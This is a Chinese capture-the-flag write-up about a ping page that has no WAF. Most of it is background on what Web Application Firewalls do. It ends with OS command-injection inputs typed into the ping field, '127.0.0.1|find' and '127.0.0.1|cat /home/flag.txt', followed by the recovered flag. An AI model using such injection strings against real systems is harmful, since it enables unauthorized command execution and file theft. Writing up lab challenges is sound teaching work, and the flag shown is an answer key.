题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。
题目网站就是这样的,啥都没有…决定从waf下手。
WAF简介:
Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称:WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。
WAF功能:
审计设备
对于系统自身安全相关的下列事件产生审计记录:
(1)管理员登录后进行的操作行为;
(2) 对安全策略进行添加、修改、删除等操作行为;
(3) 对管理角色进行增加、删除和属性修改等操作行为;
(4) 对其他安全功能配置参数的设置或更新等行为。
访问控制设备
用来控制对Web应用的访问,既包括主动安全模式也包括被动安全模式。
架构/网络设计工具
当运行在反向代理模式,他们被用来分配职能,集中控制,虚拟基础结构等。
WEB应用加固工具
这些功能增强被保护Web应用的安全性,它不仅能够屏蔽WEB应用固有弱点,而且 能够保护WEB应用编程错误导致的安全隐患。
需要指出的是,并非每种被称为Web应用防火墙的设备都同时具有以上四种功能。
同时WEB应用防火墙还具有多面性的特点。比如从网络入侵检测的角度来看可以把WAF看成运行在HTTP层上的IDS设备;从防火墙角度来看,WAF是一种防火墙的功能模块;还有人把WAF看作“深度检测防火墙”的增强。(深度检测防火墙通常工作在的网络的第三层以及更高的层次,而Web应用防火墙则在第七层处理HTTP服务并且更好地支持它。)
那这题就是所谓的没有上waf,也就是可以篡改网站。
1.先ping一下本地
发现可以ping通。
2.ping本地的同时搜索一下flag
命令:127.0.0.1 |find / -name “*.txt”
找到flag.txt
3.输出flag
命令:127.0.0.1|cat /home/flag.txt
cyberpeace{3d2f98895fa00bc85828047c30402f84}
注:以上命令在ping地址处输入即可。
